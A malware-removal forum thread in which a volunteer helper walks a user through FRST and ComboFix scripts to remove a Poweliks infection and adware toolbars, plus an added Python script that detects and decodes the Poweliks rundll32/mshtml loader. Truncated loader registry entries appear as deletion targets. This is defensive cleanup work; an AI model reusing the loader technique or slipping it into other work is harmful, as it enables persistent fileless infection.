Various "threats blocked" repeatedly

Hi, any help will be greatly appreciated. I have attached the requested logs. Thank you!

This POWELIKS malware is becoming the new EBOLA… Sheesh.

Removalist Notified, sit tight.

Ugh. Thanks!

Hello,

First, from Start > Control Panel > Programs and Features, try to uninstall the following:
Catalina Savings Printer

Also, this isn’t good.

AV: AVG Internet Security 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}

By installing two antivirus programs you will not solve the problem. Remove and uninstall one antivirus and keep the second one active.

Before executing this script, disable the AV’s real-time protection, as in this case FRST shall behave very aggressively.

1. Open notepad and copy/paste the text present inside the code box below.
To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to the operating system.

Start
File: C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\Display.dll
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-298660292-2333512594-2309689238-1001\...\MountPoints2: {8d84674c-671a-11e3-9f8a-d48564c15743} - F:\InnoTabSetup.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {C9821D6E-320A-4FC1-88D5-94822793A930} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {C9821D6E-320A-4FC1-88D5-94822793A930} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKCU - {4B45E4A6-2735-4225-8327-343970DB1298} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=&apn_dtid=OSJ000&apn_uid=784D515E-63E2-4F5F-8662-083B89FFAA62&apn_sauid=8E0F95B2-0D62-4449-AD1E-694ECD1DF29B
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://mysearch.avg.com/search?cid={D972B2FC-347A-4B23-B05A-247B4EC447F6}&mid=ca8bc220ccf147d1b94105cc2225beb0-b01acea7eee42607fef221742ba3762e22f3acec&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2013-09-09 18:27:22&v=17.1.3.3&pid=safeguard&sg=0&sap=dsp&q={searchTerms}&cmpid=0913a
SearchScopes: HKCU - {C9821D6E-320A-4FC1-88D5-94822793A930} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} ->  No File
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} ->  No File
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File
Toolbar: HKCU - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
FF HKLM-x32\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.2.101
FF Extension: AVG SafeGuard toolbar - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.2.101 [2014-01-11]
AlternateDataStreams: C:\ProgramData\Temp:054203E4
Hosts:
CustomCLSID: HKU\S-1-5-21-298660292-2333512594-2309689238-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKU\S-1-5-21-298660292-2333512594-2309689238-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
EmptyTemp:
C:\Program Files (x86)\Common Files\AVG Secure Search
C:\ProgramData\AVG SafeGuard toolbar
End

2. Save notepad as fixlist.txt to your Desktop.
NOTE: => It’s important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

3. Run FRST/FRST64 and press the Fix button just once and wait.
If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after the restart.

The tool will make a log on the Desktop (Fixlog.txt). Please attach it to your reply.
Note: If the tool warns you about an outdated version, please download and run the updated version.
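
As an added example (not part of this thread, and not code from FRST or ComboFix), a small Python script that scans FRST-style log lines for the rundll32 / mshtml,RunHTMLApplication loader flagged above and undoes the shift-by-one obfuscation of its eval() payload; the sample lines are constructed, and the only real fragment is the truncated eval prefix quoted in the FRST output.

```python
import re

# Constructed FRST-style lines for demonstration. The first reproduces the loader
# and the truncated eval() prefix quoted in this thread; the SID and the other
# two entries are made up.
SAMPLE_LINES = [
    r'CustomCLSID: HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes'
    r'\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> '
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
    r'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds',
    r'HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe',
    r'BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} ->  No File',
]

# The rundll32 + mshtml,RunHTMLApplication combination is the tell-tale Poweliks
# start-up entry; the registry path varies (Run key or a hijacked CLSID LocalServer32).
LOADER_RE = re.compile(
    r'rundll32(?:\.exe)?\s+javascript:"\\\.\.\\mshtml,RunHTMLApplication',
    re.IGNORECASE,
)
# The encoded blob never contains whitespace (a space is stored as "!"), so stop at
# the first space: FRST appends "(the data entry has N more characters)" after it.
EVAL_RE = re.compile(r'eval\("([^"\s]*)')


def deobfuscate(blob: str) -> str:
    """Undo the first stage: every character is stored shifted up by one code point."""
    return "".join(chr(ord(c) - 1) for c in blob)


def find_poweliks_loaders(lines):
    """Return (line_index, decoded_eval_prefix) for every line carrying the loader."""
    hits = []
    for idx, line in enumerate(lines):
        if not LOADER_RE.search(line):
            continue
        m = EVAL_RE.search(line)
        decoded = deobfuscate(m.group(1)) if m else ""
        hits.append((idx, decoded))
    return hits


if __name__ == "__main__":
    for idx, decoded in find_poweliks_loaders(SAMPLE_LINES):
        print(f"line {idx}: Poweliks-style loader; decoded stage 1 starts: {decoded!r}")
```

The decoded prefix of the quoted entry reads as the start of an inline JScript `document.write` call, which is what the loader hands to mshtml to run.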

Online and no blocked threats so far! Fingers crossed!

Yes, FRST has targeted the malware itself, so the malware isn’t loaded anymore. Now we shall deploy another powerful tool, as I would like to see the situation from another angle.

  1. Please download ComboFix by sUBs from here and save it to your Desktop.
     If you are unsure how ComboFix works, read this guide.

  2. Temporarily disable your AntiVirus program, usually via a right click on the System Tray icon. They may interfere with ComboFix.
     If you are unsure how to do this please read this or this Instruction.

Instructions how to disable avast:
• Right click on the avast! system tray icon in the lower right corner of the screen and scroll up to avast! shield controls;
• In the menu that appears, choose Disable Permanently. When you are prompted to turn off security, click Yes.

Note: Do not forget to turn this option back on after the cleaning by choosing avast! shield controls > Enable all shield options.

  3. Run ComboFix. Then, on the disclaimer window, click the I Agree! button.

- ComboFix will check if there is a newer version of ComboFix available.
Click Yes if prompted to download.
- If Recovery Console is not installed, ComboFix will offer download & installation.
Click Yes to allow ComboFix to install Recovery Console.

  • ComboFix will scan your computer in stages, a total of 50 stages.
    Do not mouse-click around while ComboFix is running.
  • If malware is detected, ComboFix will begin with its removal, and may need to restart Windows.
    Note: If you see a message like “Illegal operation attempted on a registry key that has been marked for deletion” just restart your computer.

  4. When the tool is finished, it will produce a log report for you. (typical location: C:\ComboFix.txt)
    => Attach the log report (ComboFix.txt) back to the topic.

ComboFix shall also create an additional log (typical location: C:\Qoobox\ComboFix-quarantined-files.txt)
=> Please attach that report (ComboFix-quarantined-files.txt) as well.

Thanks so much for all your help. Please see attached logs:

Open notepad and copy/paste the text present inside the code box below:

Registry::
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"vProt"=-

Folder::
c:\program files (x86)\AVG SafeGuard toolbar
c:\program files (x86)\Common Files\AVG Secure Search

Driver::
vToolbarUpdater18.1.9

File::
c:\windows\Tasks\AVG-Secure-Search-Update_0214b_rel.job
c:\windows\Tasks\AVG-Secure-Search-Update_0214b_rmv.job

Save this as CFScript.txt

http://img.photobucket.com/albums/v666/sUBs/CFScriptB-4.gif

Close all browser windows and, referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
ComboFix will re-run. When finished, it will produce a log for you.
Attach the contents of the log in your next reply. (typical location: C:\ComboFix.txt)

Run the FRST tool again, check the box for the Addition.txt option and press the Scan button. Post both freshly created FRST.txt and Addition.txt logs for re-analysis.

When I run the CFScript.txt it comes up with a message after the scan saying: “Unable to create backup of the current registry file C:\Windows\System32\config\SYSTEM! Continue restoration of this file?”
Please advise!

I went ahead and continued with restoration as I assumed that I could restore from a previous backup if necessary. Attached are the requested logs. Thanks again.

Yes, you did the right thing by continuing with the steps. The ERUNT tool integrated into ComboFix and FRST has refused to work, thus creating the error.

1. Open notepad and copy/paste the text present inside the code box below.
To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to the operating system.

CloseProcesses:
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -  No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -  No File
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
Hosts:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-298660292-2333512594-2309689238-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
CHR Extension: (AVG SafeGuard) - C:\Users\Ray\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2013-10-05]
EmptyTemp:
C:\Users\Ray\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof

2. Save notepad as fixlist.txt to your Desktop.
NOTE: => It’s important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

3. Run FRST/FRST64 and press the Fix button just once and wait.
If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after the restart.

The tool will make a log on the Desktop (Fixlog.txt). Please attach it to your reply.
Note: If the tool warns you about an outdated version, please download and run the updated version.

How is the computer behaving now?

The computer seems to be running normally, now. I have had the AV turned off while I’ve been working these steps, so I’m unsure if the pop ups have stopped. It is definitely running faster and more smoothly. Please see attached.

Turned Avast back on and no popups at all! I’m thrilled as they were coming at several per minute before. ;D

So … did we fix the problem? :) If so, I intend to remove my tools.

It appears so. Thank you very much!

The following will implement some post-cleanup procedures:

=> Please download DelFix by Xplode to your Desktop.

Run the tool and check the following boxes:
• Remove disinfection tools
• Create registry backup
• Purge System Restore
Click the Run button and wait a few seconds for the programme to complete its work.
At this point all the tools we used here should be gone. The tool will create a report for you (C:\DelFix.txt).

The tool will also record the healthy state of the registry and make a backup using the ERUNT program in %windir%\ERUNT\DelFix.
The tool deletes old system restore points and creates a fresh system restore point after cleaning.

Done! You’re awesome! Very much appreciated.